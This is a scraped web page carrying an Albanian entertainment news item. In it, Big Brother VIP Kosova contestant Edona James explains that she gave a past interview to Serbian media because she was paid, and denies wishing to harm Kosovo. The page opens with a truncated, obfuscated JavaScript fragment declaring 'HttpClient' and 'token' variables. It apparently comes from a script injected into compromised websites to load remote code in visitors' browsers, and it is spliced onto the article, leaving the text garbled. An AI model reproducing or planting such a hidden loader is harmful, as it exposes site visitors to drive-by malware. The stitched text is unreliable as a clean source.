;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Edona për intervistën në Serbi: Jam paguar shumë, prandaj e bëra

By

Ajo ishte padyshim një nga personazhet më të komentuara të edicionit të dytë të Big Brother VIP Kosova.

Bëhet fjalë për Edona James, e cila pos që rrëmbeu masivisht zemrat e publikut, ua prishi qejfin këtyre të fundit me një intervistë dhënë për një medium serb shumë vite më parë.

Së fundmi ajo ka thënë se nuk ka qenë qëllimi i saj ta dëmtojë Kosovën – e ka bërë sepse ka pranuar pagesë.

“Kam komente që më shkruajnë ‘o serb’ ose ndonjë të tillë, por unë nuk jam ndjerë kurrë serbe dhe nuk do të ndihem asnjëherë. Unë e di çka ka ndodh ndaj nesh, dhe nuk e harroj kurrë. Unë jam një artiste, një artiste shkon për punën e saj. Në atë kohë më kanë dhënë shumë para, edhe unë në atë kohë jam bullizuar, jam ofenduar, bullizimi është i vogël. Një shqiptari është quar në këmbë për të m’i thënë të gjitha të zezat”, tha ajo.

“Unë këtë nuk e kam bërë në dëm të Kosovës,për t’i bërë dëm vendit tim ku jam rrit, ku i kam rrënjët”, shtoi ajo.

Artikuj të ngjashëm